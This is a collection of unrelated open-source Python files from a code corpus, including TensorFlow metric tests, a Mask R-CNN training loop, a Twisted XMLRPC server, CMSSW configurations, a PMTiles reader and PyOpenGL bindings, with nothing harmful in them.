tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
},
'exception_class':
NotImplementedError,
}, {
'testcase_name':
'roc_rank3_prob_tensor',
'metric_fn_factory':
metric_fns.make_auc_roc_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[[0.5, 0.5], [0.5, 0.5]],
[[0.5, 0.5], [0.5, 0.5]]],
dtype=tf.float32),
},
'exception_class':
ValueError,
}, {
'testcase_name':
'roc_prob_tensor_3_classes',
'metric_fn_factory':
metric_fns.make_auc_roc_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([2, 1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0, 0.0], [1.0, 0.0, 0.0]],
dtype=tf.float32),
},
'exception_class':
ValueError,
}, {
'testcase_name':
'pr_multi_task',
'metric_fn_factory':
metric_fns.make_auc_pr_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: {
'task_a': tf.constant([1, 0], dtype=tf.int64),
'task_b': tf.constant([1, 0], dtype=tf.int64),
},
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
'probabilities/task_a':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
'probabilities/task_b':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
},
'exception_class':
NotImplementedError,
}, {
'testcase_name':
'pr_rank3_prob_tensor',
'metric_fn_factory':
metric_fns.make_auc_pr_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[[0.5, 0.5], [0.5, 0.5]],
[[0.5, 0.5], [0.5, 0.5]]],
dtype=tf.float32),
},
'exception_class':
ValueError,
}, {
'testcase_name':
'pr_prob_tensor_3_classes',
'metric_fn_factory':
metric_fns.make_auc_pr_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([2, 1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0, 0.0], [1.0, 0.0, 0.0]],
dtype=tf.float32),
},
'exception_class':
ValueError,
}, {
'testcase_name':
'roc_string_label_no_vocab',
'metric_fn_factory':
metric_fns.make_auc_roc_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant(['ONE', 'ZERO'], dtype=tf.string),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[1.0, 0.0], [0.0, 1.0]], dtype=tf.float32),
},
'exception_class':
ValueError,
})
# pylint: enable=g-long-lambda
def test_auc_metric_fn_error(self, metric_fn_factory, label_vocabulary,
labels_fn, predictions_fn, exception_class):
with self.assertRaises(exception_class):
metric_fn = metric_fn_factory(label_vocabulary)
metric_fn(labels_fn(), predictions_fn())
def test_create_num_parameters_metric_fn_no_tower(self):
# Force graph mode
with tf.compat.v1.Graph().as_default():
_ = tf.compat.v1.get_variable(
name='w', shape=[10, 2], dtype=tf.float32, trainable=True)
_ = tf.compat.v1.get_variable(
name='b', shape=[2], dtype=tf.float32, trainable=True)
metric_fn = metric_fns.create_num_parameters_metric_fn(None)
metrics_dict = metric_fn(None, None)
with self.test_session() as sess:
self.assertEqual(22, sess.run(metrics_dict['num_parameters'][1]))
def test_create_num_parameters_metric_fn_with_tower(self):
# Force graph mode
with tf.compat.v1.Graph().as_default():
_ = tf.compat.v1.get_variable(
name='Phoenix/name', shape=[10, 2], dtype=tf.float32, trainable=True)
_ = tf.compat.v1.get_variable(
name='b', shape=[2], dtype=tf.float32, trainable=True)
metric_fn = metric_fns.create_num_parameters_metric_fn('name')
metrics_dict = metric_fn(None, None)
with self.test_session() as sess:
self.assertEqual(20, sess.run(metrics_dict['num_parameters'][1]))
def test_combine_metric_fns(self):
# Force graph mode
with tf.compat.v1.Graph().as_default():
def metric_fn_1(labels, predictions, weights=None):
del labels
del predictions
del weights
one = tf.constant(1, dtype=tf.int32)
return {'foo1': (one, one)}
def metric_fn_2(labels, predictions, weights=None):
del labels
del predictions
del weights
two = tf.constant(2, dtype=tf.int32)
return {'foo2': (two, two)}
metric_fn_combined = metric_fns.combine_metric_fns(
[metric_fn_1, metric_fn_2])
metrics_dict = metric_fn_combined(None, None)
with self.test_session() as sess:
self.assertEqual(1, sess.run(metrics_dict['foo1'][1]))
self.assertEqual(2, sess.run(metrics_dict['foo2'][1]))
if __name__ == '__main__':
tf.enable_v2_behavior()
tf.test.main()
|
dirscan/dirsearch/thirdparty/sqlmap/__init__.py | imfiver/Sec-Tools | 351 | 12652408 |
from .DynamicContentParser import *
|
build/scripts/run_tool.py | HeyLey/catboost | 6,989 | 12652454 | import sys
import subprocess
import os
if __name__ == '__main__':
env = os.environ.copy()
env['ASAN_OPTIONS'] = 'detect_leaks=0'
subprocess.check_call(sys.argv[sys.argv.index('--') + 1:], env=env)
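# Example invocation (illustrative): everything after "--" is executed as the tool's
# command line, with AddressSanitizer leak detection disabled via ASAN_OPTIONS:
#   python run_tool.py -- ./some_tool --some-flag value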
|
mask_rcnn_train_chain.py | mikito0011/Chainer_Mask_R-CNN | 153 | 12652463 | import numpy as np
import chainer
from chainer import cuda
import chainer.functions as F
from chainercv.links.model.faster_rcnn.utils.anchor_target_creator import AnchorTargetCreator
from utils.proposal_target_creator import ProposalTargetCreator
from chainer import computational_graph as c
from chainercv.links import PixelwiseSoftmaxClassifier
class MaskRCNNTrainChain(chainer.Chain):
def __init__(self, mask_rcnn, rpn_sigma=3., roi_sigma=1., gamma=1,
anchor_target_creator=AnchorTargetCreator(),
roi_size=14):
super(MaskRCNNTrainChain, self).__init__()
with self.init_scope():
self.mask_rcnn = mask_rcnn
self.rpn_sigma = rpn_sigma
self.roi_sigma = roi_sigma
self.anchor_target_creator = anchor_target_creator
self.proposal_target_creator = ProposalTargetCreator(roi_size=roi_size//2)
self.loc_normalize_mean = mask_rcnn.loc_normalize_mean
self.loc_normalize_std = mask_rcnn.loc_normalize_std
self.decayrate=0.99
self.avg_loss = None
self.gamma=gamma
def __call__(self, imgs, bboxes, labels, scale, masks, i):
if isinstance(bboxes, chainer.Variable):
bboxes = bboxes.data
if isinstance(labels, chainer.Variable):
labels = labels.data
if isinstance(scale, chainer.Variable):
scale = scale.data
if isinstance(masks, chainer.Variable):
masks = masks.data
scale = np.asscalar(cuda.to_cpu(scale))
n = bboxes.shape[0]
if n != 1:
raise ValueError('only batch size 1 is supported')
_, _, H, W = imgs.shape
img_size = (H, W)
#Extractor (VGG) : img -> features
with chainer.using_config('train', False):
features = self.mask_rcnn.extractor(imgs)
#Region Proposal Network : features -> rpn_locs, rpn_scores, rois
rpn_locs, rpn_scores, rois, roi_indices, anchor = self.mask_rcnn.rpn(
features, img_size, scale)
bbox, label, mask, rpn_score, rpn_loc, roi = \
bboxes[0], labels[0], masks[0], rpn_scores[0], rpn_locs[0], rois # batch size=1
#proposal target : roi(proposed) , bbox(GT), label(GT) -> sample_roi, gt_roi_loc, gt_roi_label
#the targets are compared with the head output.
sample_roi, gt_roi_loc, gt_roi_label, gt_roi_mask = self.proposal_target_creator(
roi, bbox, label, mask, self.loc_normalize_mean, self.loc_normalize_std)
sample_roi_index = self.xp.zeros((len(sample_roi),), dtype=np.int32)
#Head Network : features, sample_roi -> roi_cls_loc, roi_score
with chainer.using_config('train', False):
hres5 = self.mask_rcnn.head.res5head(features, sample_roi, sample_roi_index)
roi_cls_loc, roi_score = self.mask_rcnn.head.boxhead(hres5)
roi_cls_mask = self.mask_rcnn.head.maskhead(hres5)
del(hres5)
#RPN losses
gt_rpn_loc, gt_rpn_label = self.anchor_target_creator(bbox, anchor, img_size)
rpn_loc_loss = _fast_rcnn_loc_loss(rpn_loc, gt_rpn_loc, gt_rpn_label, self.rpn_sigma)
rpn_cls_loss = F.sigmoid_cross_entropy(rpn_score, gt_rpn_label)
#Head output losses
n_sample = roi_cls_loc.shape[0]
roi_cls_loc = roi_cls_loc.reshape((n_sample, -1, 4))
roi_loc = roi_cls_loc[self.xp.arange(n_sample), gt_roi_label]
roi_mask = roi_cls_mask[self.xp.arange(n_sample), gt_roi_label]
roi_loc_loss = _fast_rcnn_loc_loss(roi_loc, gt_roi_loc, gt_roi_label, self.roi_sigma)
roi_cls_loss = F.softmax_cross_entropy(roi_score, gt_roi_label)
#mask loss: average binary cross-entropy loss
mask_loss = F.sigmoid_cross_entropy(roi_mask[0:gt_roi_mask.shape[0]], gt_roi_mask)
#total loss
loss = rpn_loc_loss + rpn_cls_loss + roi_loc_loss + roi_cls_loss + self.gamma * mask_loss
#avg loss calculation
if self.avg_loss is None:
self.avg_loss = loss.data
else:
self.avg_loss = self.avg_loss * self.decayrate + loss.data*(1-self.decayrate)
chainer.reporter.report({'rpn_loc_loss':rpn_loc_loss,
'rpn_cls_loss':rpn_cls_loss,
'roi_loc_loss':roi_loc_loss,
'roi_cls_loss':roi_cls_loss,
'roi_mask_loss':self.gamma * mask_loss,
'avg_loss':self.avg_loss,
'loss':loss}, self)
return loss
def _smooth_l1_loss(x, t, in_weight, sigma):
sigma2 = sigma ** 2
diff = in_weight * (x - t)
abs_diff = F.absolute(diff)
flag = (abs_diff.data < (1. / sigma2)).astype(np.float32)
y = (flag * (sigma2 / 2.) * F.square(diff) +
(1 - flag) * (abs_diff - 0.5 / sigma2))
return F.sum(y)
def _fast_rcnn_loc_loss(pred_loc, gt_loc, gt_label, sigma):
xp = chainer.cuda.get_array_module(pred_loc)
in_weight = xp.zeros_like(gt_loc)
in_weight[gt_label > 0] = 1
loc_loss = _smooth_l1_loss(pred_loc, gt_loc, in_weight, sigma)
loc_loss /= xp.sum(gt_label >= 0)
return loc_loss
|
src/gimelstudio/core/__init__.py | Correct-Syntax/GimelStudio | 134 | 12652503 | from .datatypes import RenderImage
from .eval_info import EvalInfo
from .output_eval import OutputNodeEval
from .renderer import Renderer
from .glsl_renderer import GLSLRenderer
from .registry import RegisterNode, UnregisterNode, NODE_REGISTRY
from .project_file import ProjectFileIO
|
trigger/contrib/xmlrpc/server.py | jccardonar/trigger | 380 | 12652539 | """
Trigger Twisted XMLRPC server with an SSH manhole. Supports SSL.
This provides a daemonized Twisted reactor loop, Trigger and client
applications do not have to co-habitate. Using the XMLRPC server model, all
Trigger compatibility tasks can be executed using simple XMLRPC clients that
call the appropriate method with arguments on the local XMLRPC server instance.
New methods can be added by way of plugins.
See ``examples/xmlrpc_server`` in the Trigger source distribution for a simple
usage example.
"""
import os
import sys
import types
from trigger.contrib.commando import CommandoApplication
from trigger.utils import importlib
from twisted.internet import defer
from twisted.python import log
from twisted.web import xmlrpc, server
# Enable Deferred debuging if ``DEBUG`` is set.
if os.getenv('DEBUG'):
defer.setDebugging(True)
class TriggerXMLRPCServer(xmlrpc.XMLRPC):
"""
Twisted XMLRPC server front-end for Commando
"""
def __init__(self, *args, **kwargs):
xmlrpc.XMLRPC.__init__(self, *args, **kwargs)
self.allowNone = True
self.useDateTime = True
self._handlers = []
self._procedure_map = {}
self.addHandlers(self._handlers)
def lookupProcedure(self, procedurePath):
"""
Lookup a method dynamically.
1. First, see if it's provided by a sub-handler.
2. Or try a self-defined method (prefixed with `xmlrpc_`)
3. Lastly, try dynamically mapped methods.
4. Or fail loudly.
"""
log.msg("LOOKING UP:", procedurePath)
if procedurePath.find(self.separator) != -1:
prefix, procedurePath = procedurePath.split(self.separator, 1)
handler = self.getSubHandler(prefix)
if handler is None:
raise xmlrpc.NoSuchFunction(self.NOT_FOUND,
"no such subHandler %s" % prefix)
return handler.lookupProcedure(procedurePath)
# Try self-defined methods first...
f = getattr(self, "xmlrpc_%s" % procedurePath, None)
# Try mapped methods second...
if f is None:
f = self._procedure_map.get(procedurePath, None)
if not f:
raise xmlrpc.NoSuchFunction(self.NOT_FOUND,
"procedure %s not found" % procedurePath)
elif not callable(f):
raise xmlrpc.NoSuchFunction(self.NOT_FOUND,
"procedure %s not callable" % procedurePath)
else:
return f
def addHandlers(self, handlers):
"""Add multiple handlers"""
for handler in handlers:
self.addHandler(handler)
def addHandler(self, handler):
"""
Add a handler and bind it to an XMLRPC procedure.
Handler must a be a function or an instance of an object with handler
methods.
"""
# Register it
log.msg("Adding handler: %s" % handler)
self._handlers.append(handler)
# If it's a function, bind it as its own internal name.
if type(handler) in (types.BuiltinFunctionType, types.FunctionType):
name = handler.__name__
if name.startswith('xmlrpc_'):
name = name[7:] # If it starts w/ 'xmlrpc_', slice it out!
log.msg("Mapping function %s..." % name)
self._procedure_map[name] = handler
return None
# Otherwise, walk the methods on any class objects and bind them by
# their attribute name.
for method in dir(handler):
if not method.startswith('_'):
log.msg("Mapping method %s..." % method)
self._procedure_map[method] = getattr(handler, method)
def listProcedures(self):
"""Return a list of the registered procedures"""
return self._procedure_map.keys()
def xmlrpc_add_handler(self, mod_name, task_name, force=False):
"""
Add a handler object from a remote call.
"""
module = None
if mod_name in sys.modules:
# Check if module is already loaded
if force:
log.msg("Forcing reload of handler: %r" % task_name)
# Allow user to force reload of module
module = reload(sys.modules[mod_name])
else:
# If not forcing reload, don't bother with the rest
log.msg("%r already loaded" % mod_name)
return None
else:
log.msg("Trying to add handler: %r" % task_name)
try:
module = importlib.import_module(mod_name, __name__)
except NameError as msg:
log.msg('NameError: %s' % msg)
except:
pass
if not module:
log.msg(" Unable to load module: %s" % mod_name)
return None
else:
handler = getattr(module, 'xmlrpc_' + task_name)
# XMLRPC methods will not accept kwargs. Instead, we pass 2 position
# args: args and kwargs, to a shell method (dummy) that will explode
# them when sending to the user defined method (handler).
def dummy(self, args, kwargs):
return handler(*args, **kwargs)
# TODO (jathan): Make this work!!
# This just simply does not work. I am not sure why, but it results in a
# "<Fault 8001: 'procedure config_device not found'>" error!
# # Bind the dummy shell method to TriggerXMLRPCServer. The function's
# # name will be used to map it to the "dummy" handler object.
# dummy.__name__ = task_name
# self.addHandler(dummy)
# This does work.
# Bind the dummy shell method to TriggerXMLRPCServer as 'xmlrpc_' + task_name
setattr(TriggerXMLRPCServer, 'xmlrpc_' + task_name, dummy)
def xmlrpc_list_subhandlers(self):
return list(self.subHandlers)
def xmlrpc_execute_commands(self, args, kwargs):
"""Execute ``commands`` on ``devices``"""
c = CommandoApplication(*args, **kwargs)
d = c.run()
return d
def xmlrpc_add(self, x, y):
"""Adds x and y"""
return x + y
def xmlrpc_fault(self):
"""
Raise a Fault indicating that the procedure should not be used.
"""
raise xmlrpc.Fault(123, "The fault procedure is faulty.")
def _ebRender(self, failure):
"""
Custom exception rendering.
Ref: https://netzguerilla.net/iro/dev/_modules/iro/view/xmlrpc.html
"""
if isinstance(failure.value, Exception):
msg = """%s: %s""" % (failure.type.__name__, failure.value.args[0])
return xmlrpc.Fault(400, msg)
return super(TriggerXMLRPCServer, self)._ebRender(failure)
# XXX (jathan): Note that this is out-of-sync w/ the twistd plugin and is
# probably broken.
def main():
"""To daemonize as a twistd plugin! Except this doesn't work and these"""
from twisted.application.internet import TCPServer, SSLServer
from twisted.application.service import Application
from twisted.internet import ssl
rpc = TriggerXMLRPCServer()
xmlrpc.addIntrospection(rpc)
server_factory = server.Site(rpc)
application = Application('trigger_xmlrpc')
#xmlrpc_service = TCPServer(8000, server_factory)
ctx = ssl.DefaultOpenSSLContextFactory('server.key', 'cacert.pem')
xmlrpc_service = SSLServer(8000, server_factory, ctx)
xmlrpc_service.setServiceParent(application)
return application
if __name__ == '__main__':
# To run me as a daemon:
# twistd -l server.log --pidfile server.pid -y server.py
application = main()
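# Client-side sketch (not part of this module): with the SSL server above listening
# on port 8000, a Python 2 client could call the built-in procedures like so:
#   import xmlrpclib
#   proxy = xmlrpclib.ServerProxy('https://localhost:8000/')
#   print(proxy.add(2, 3)) # -> 5, handled by TriggerXMLRPCServer.xmlrpc_add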
|
SimG4Core/PrintGeomInfo/python/testTotemGeometryXML_cfi.py | ckamtsikis/cmssw | 852 | 12652542 |
import FWCore.ParameterSet.Config as cms
XMLIdealGeometryESSource = cms.ESSource("XMLIdealGeometryESSource",
geomXMLFiles = cms.vstring('Geometry/CMSCommonData/data/materials.xml',
'Geometry/CMSCommonData/data/rotations.xml',
'Geometry/CMSCommonData/data/extend/cmsextent.xml',
'Geometry/CMSCommonData/data/cms.xml',
'Geometry/CMSCommonData/data/cmsMother.xml',
'Geometry/ForwardCommonData/data/forward.xml',
'Geometry/ForwardCommonData/data/totemMaterials.xml',
'Geometry/ForwardCommonData/data/totemRotations.xml',
'Geometry/ForwardCommonData/data/totemt1.xml',
'Geometry/ForwardCommonData/data/totemt2.xml',
'Geometry/ForwardCommonData/data/ionpump.xml',
'Geometry/ForwardSimData/data/totemsensT1.xml',
'Geometry/ForwardSimData/data/totemsensT2.xml',
'Geometry/CMSCommonData/data/FieldParameters.xml'),
rootNodeName = cms.string('cms:OCMS')
)
|
RST/ODSAextensions/odsa/chapnum/chapnum.py | dwgillies/OpenDSA | 200 | 12652563 |
# Copyright (C) 2012 <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the MIT License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
#
__author__ = 'efouh'
__docformat__ = 'reStructuredText'
import re
import sys
from docutils import nodes, utils
from docutils.transforms import TransformError, Transform
from docutils.parsers.rst import directives
from docutils.parsers.rst import Directive
from docutils import nodes, languages
from docutils.transforms import parts
def setup(app):
app.add_directive('chapnum',chapnum)
class chapnum(Directive):
"""Automatic section numbering. with space at the end"""
option_spec = {'depth': int,
'start': int,
'prefix': directives.unchanged_required,
'suffix': directives.unchanged_required}
def run(self):
tmp = self.options['prefix']
tmp += ' '
self.options['prefix'] = tmp
pending = nodes.pending(parts.SectNum)
pending.details.update(self.options)
self.state_machine.document.note_pending(pending)
return [pending]
if __name__ == '__main__':
directives.register_directive('chapnum',chapnum)
|
python/pmtiles/reader.py | eddy-geek/PMTiles | 133 | 12652568 | import json
import mmap
from contextlib import contextmanager
@contextmanager
def read(fname):
r = Reader(fname)
try:
yield r
finally:
r.close()
class Reader:
def __init__(self,fname):
self.f = open(fname, "r+b")
self.mmap = mmap.mmap(self.f.fileno(), 0)
assert int.from_bytes(self.mmap[0:2],byteorder='little') == 0x4D50
first_entry_idx = 10+self.metadata_len
self.root_dir, self.leaves = self.load_directory(first_entry_idx,self.root_entries)
def load_directory(self,offset,num_entries):
directory = {}
leaves = {}
for i in range(offset,offset+num_entries*17,17):
z = int.from_bytes(self.mmap[i:i+1],byteorder='little')
x = int.from_bytes(self.mmap[i+1:i+4],byteorder='little')
y = int.from_bytes(self.mmap[i+4:i+7],byteorder='little')
tile_off = int.from_bytes(self.mmap[i+7:i+13],byteorder='little')
tile_len = int.from_bytes(self.mmap[i+13:i+17],byteorder='little')
if (z & 0b10000000):
leaves[(z & 0b01111111,x,y)] = (tile_off,tile_len)
else:
directory[(z,x,y)] = (tile_off,tile_len)
return (directory,leaves)
def close(self):
self.f.close()
@property
def metadata_len(self):
return int.from_bytes(self.mmap[4:8],byteorder='little')
@property
def metadata(self):
s = self.mmap[10:10+self.metadata_len]
return json.loads(s)
@property
def version(self):
return int.from_bytes(self.mmap[2:4],byteorder='little')
@property
def root_entries(self):
return int.from_bytes(self.mmap[8:10],byteorder='little')
def get(self,z,x,y):
val = self.root_dir.get((z,x,y))
if val:
return self.mmap[val[0]:val[0]+val[1]]
else:
z7_tile_diff = z - 7
z7_tile = (7,x // (1 << z7_tile_diff),y // (1 << z7_tile_diff))
val = self.leaves.get(z7_tile)
if val:
directory, _ = self.load_directory(val[0],val[1]//17)
val = directory.get((z,x,y))
if val:
return self.mmap[val[0]:val[0]+val[1]]
def tiles(self):
for k,v in self.root_dir.items():
yield (k,self.mmap[v[0]:v[0]+v[1]])
for val in self.leaves.values():
leaf_dir, _ = self.load_directory(val[0],val[1]//17)
for k,v in leaf_dir.items():
yield (k,self.mmap[v[0]:v[0]+v[1]])
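# Usage sketch (assumes an existing archive at "tiles.pmtiles"):
#   with read("tiles.pmtiles") as r:
#       print(r.metadata)
#       tile_bytes = r.get(0, 0, 0) # raw tile bytes for zoom 0 (assumes the tile exists in the archive)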
|
pipenv/vendor/passa/internals/traces.py | jrottenberg/pipenv | 6,263 | 12652581 |
# -*- coding=utf-8 -*-
from __future__ import absolute_import, unicode_literals
def _trace_visit_vertex(graph, current, target, visited, path, paths):
if current == target:
paths.append(path)
return
for v in graph.iter_children(current):
if v == current or v in visited:
continue
next_path = path + [current]
next_visited = visited | {current}
_trace_visit_vertex(graph, v, target, next_visited, next_path, paths)
def trace_graph(graph):
"""Build a collection of "traces" for each package.
A trace is a list of names that eventually leads to the package. For
example, if A and B are root dependencies, A depends on C and D, B
depends on C, and C depends on D, the return value would be like::
{
None: [],
"A": [None],
"B": [None],
"C": [[None, "A"], [None, "B"]],
"D": [[None, "B", "C"], [None, "A"]],
}
"""
result = {None: []}
for vertex in graph:
result[vertex] = []
for root in graph.iter_children(None):
paths = []
_trace_visit_vertex(graph, root, vertex, {None}, [None], paths)
result[vertex].extend(paths)
return result
|
alipay/aop/api/domain/OrderStatusData.py | antopen/alipay-sdk-python-all | 213 | 12652592 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class OrderStatusData(object):
def __init__(self):
self._order_id = None
self._reject_reason = None
self._status = None
@property
def order_id(self):
return self._order_id
@order_id.setter
def order_id(self, value):
self._order_id = value
@property
def reject_reason(self):
return self._reject_reason
@reject_reason.setter
def reject_reason(self, value):
self._reject_reason = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
def to_alipay_dict(self):
params = dict()
if self.order_id:
if hasattr(self.order_id, 'to_alipay_dict'):
params['order_id'] = self.order_id.to_alipay_dict()
else:
params['order_id'] = self.order_id
if self.reject_reason:
if hasattr(self.reject_reason, 'to_alipay_dict'):
params['reject_reason'] = self.reject_reason.to_alipay_dict()
else:
params['reject_reason'] = self.reject_reason
if self.status:
if hasattr(self.status, 'to_alipay_dict'):
params['status'] = self.status.to_alipay_dict()
else:
params['status'] = self.status
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = OrderStatusData()
if 'order_id' in d:
o.order_id = d['order_id']
if 'reject_reason' in d:
o.reject_reason = d['reject_reason']
if 'status' in d:
o.status = d['status']
return o
|
atest/logcheck.py | icankeep/jupyterlab-lsp | 1,117 | 12652689 |
from bs4 import UnicodeDammit
def file_should_not_contain_phrases(filename, offset=0, *phrases):
"""don't fail _too_ hard if the file can't be read for some reason"""
with open(filename, "rb") as fp:
raw = fp.read()[offset:]
text = None
try:
text = raw.decode("utf-8")
except Exception as err:
print("Failed to read", filename, "forcing unicode...\n", err)
try:
text = UnicodeDammit.detwingle(raw).decode("utf-8")
except Exception as err:
print("Failed to read", filename, "giving up...\n", err)
text = None
matches = {}
if text is not None:
for phrase in phrases:
if phrase in text:
matches[phrase] = True
assert not matches, "Phrases found in {}: {}".format(filename, matches)
|
app/demo/periods/__init__.py | sesostris/django-material-admin | 270 | 12652690 | default_app_config = 'demo.periods.apps.PeriodsConfig'
|
symmetric_tree/solution.py | mahimadubey/leetcode-python | 528 | 12652695 |
"""
Given a binary tree, check whether it is a mirror of itself (ie, symmetric
around its center).
For example, this binary tree is symmetric:
1
/ \
2 2
/ \ / \
3 4 4 3
But the following is not:
1
/ \
2 2
\ \
3 3
"""
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def isSymmetric(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
if root is None:
return True
if root.left is None and root.right is None:
return True
if root.left is not None and root.right is not None:
return self._isSymmetric(root.left, root.right)
return False
def _isSymmetric(self, left, right):
if left is None and right is None:
return True
if left is not None and right is not None:
return (left.val == right.val and
self._isSymmetric(left.left, right.right) and
self._isSymmetric(left.right, right.left))
return False
|
tests/test_client/auth_backends.py | jpmallarino/django | 61,676 | 12652704 | from django.contrib.auth.backends import ModelBackend
class TestClientBackend(ModelBackend):
pass
class BackendWithoutGetUserMethod:
pass
|
HLTriggerOffline/SUSYBSM/test/SUSYBSM_triggerValidation.py | ckamtsikis/cmssw | 852 | 12652707 | import FWCore.ParameterSet.Config as cms
process = cms.Process("DQM")
#
# DQM SERVICES
#
process.load("DQMServices.Core.DQM_cfg")
process.load("FWCore.MessageService.MessageLogger_cfi")
#
# DQM SOURCES
#
process.load("CondCore.DBCommon.CondDBSetup_cfi")
#process.load("Configuration.GlobalRuns.ForceZeroTeslaField_cff")
#process.load("Configuration.GlobalRuns.ReconstructionGR_cff")
process.load("Configuration.StandardSequences.GeometryRecoDB_cff")
#process.load("L1Trigger.Configuration.L1Config_cff")
process.load("L1TriggerConfig.L1ScalesProducers.L1MuTriggerScalesConfig_cff")
process.load("L1TriggerConfig.L1ScalesProducers.L1MuTriggerPtScaleConfig_cff")
process.load("L1TriggerConfig.L1GtConfigProducers.L1GtBoardMapsConfig_cff")
process.load("L1TriggerConfig.L1GtConfigProducers.L1GtConfig_cff")
process.load("L1TriggerConfig.L1GtConfigProducers.Luminosity.lumi1030.L1Menu2008_2E30_Unprescaled_cff")
#process.load("L1Trigger.HardwareValidation.L1HardwareValidation_cff")
process.load("DQMServices.Components.DQMEnvironment_cfi")
# The GenMET is not in the edm root files. You have to produce it by yourself
process.load("RecoMET.Configuration.GenMETParticles_cff")
process.load("RecoMET.METProducers.genMetTrue_cfi")
process.load("HLTriggerOffline.SUSYBSM.SUSYBSM_triggerValidation_cff")
process.load("Geometry.CaloEventSetup.CaloTopology_cfi")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(10)
)
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
#"file:/build/nuno/test31/CMSSW_3_1_0_pre5/src/TTbar_Tauola_cfi_py_GEN_FASTSIM_VALIDATION.root"
'/store/relval/CMSSW_3_1_0_pre5/RelValQCD_Pt_80_120/GEN-SIM-RECO/IDEAL_31X_v1/0000/E63C1A00-0C2C-DE11-BFC1-000423D98800.root'
)
)
process.MessageLogger = cms.Service("MessageLogger",
detailedInfo = cms.untracked.PSet(
threshold = cms.untracked.string('INFO')
),
critical = cms.untracked.PSet(
threshold = cms.untracked.string('ERROR')
),
debugModules = cms.untracked.vstring('*'),
cout = cms.untracked.PSet(
threshold = cms.untracked.string('WARNING'),
WARNING = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
noLineBreaks = cms.untracked.bool(True)
),
destinations = cms.untracked.vstring('detailedInfo',
'critical',
'cout')
)
process.p = cms.Path(process.genCandidatesForMET*process.genParticlesForMETAllVisible*process.genMetTrue*process.HLTSusyExoVal)
process.pEnd = cms.Path(process.dqmSaver)
process.DQMStore.verbose = 0
process.DQM.collectorHost = ''
process.dqmSaver.convention = 'Online'
process.dqmSaver.saveByRun = 1
process.dqmSaver.saveAtJobEnd = True
|
deep-rl/lib/python2.7/site-packages/OpenGL/raw/GL/SUN/vertex.py | ShujaKhalid/deep-rl | 210 | 12652727 | <filename>deep-rl/lib/python2.7/site-packages/OpenGL/raw/GL/SUN/vertex.py
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_SUN_vertex'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_SUN_vertex',error_checker=_errors._error_checker)
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glColor3fVertex3fSUN(r,g,b,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray)
def glColor3fVertex3fvSUN(c,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glColor4fNormal3fVertex3fSUN(r,g,b,a,nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glColor4fNormal3fVertex3fvSUN(c,n,v):pass
@_f
@_p.types(None,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLfloat,_cs.GLfloat)
def glColor4ubVertex2fSUN(r,g,b,a,x,y):pass
@_f
@_p.types(None,arrays.GLubyteArray,arrays.GLfloatArray)
def glColor4ubVertex2fvSUN(c,v):pass
@_f
@_p.types(None,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glColor4ubVertex3fSUN(r,g,b,a,x,y,z):pass
@_f
@_p.types(None,arrays.GLubyteArray,arrays.GLfloatArray)
def glColor4ubVertex3fvSUN(c,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glNormal3fVertex3fSUN(nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray)
def glNormal3fVertex3fvSUN(n,v):pass
@_f
